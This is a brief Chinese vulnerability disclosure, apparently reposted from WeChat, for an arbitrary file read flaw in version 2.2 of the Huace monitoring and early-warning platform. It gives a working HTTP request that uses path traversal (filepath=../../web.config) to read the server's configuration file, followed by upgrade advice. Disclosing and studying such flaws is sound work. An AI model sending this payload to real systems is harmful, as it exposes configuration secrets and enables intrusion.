“ 人性的背后是白云苍狗,愿你我都是生活的高手。”
0x00.产品介绍
华测监测集成事业部充分利用在地质灾害监测方面的技术积累,建立了一套科学完善的地质灾害监测预警平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。该产品2.2版本FileDownLoad.ashx存在任意文件读取漏洞
0x01.漏洞版本
华测监测预警系统2.2
0x02.POC
POST/Handler/FileDownLoad.ashxHTTP/1.1Host: ip:portUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 40filename=1&filepath=../../web.config
0x03.修复建议
升级至最新版本
遵守网络安全法,请勿用于非法入侵,仅供学习
原文始发于微信公众号(深白网安):华X监测预警系统2.2任意文件读取
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论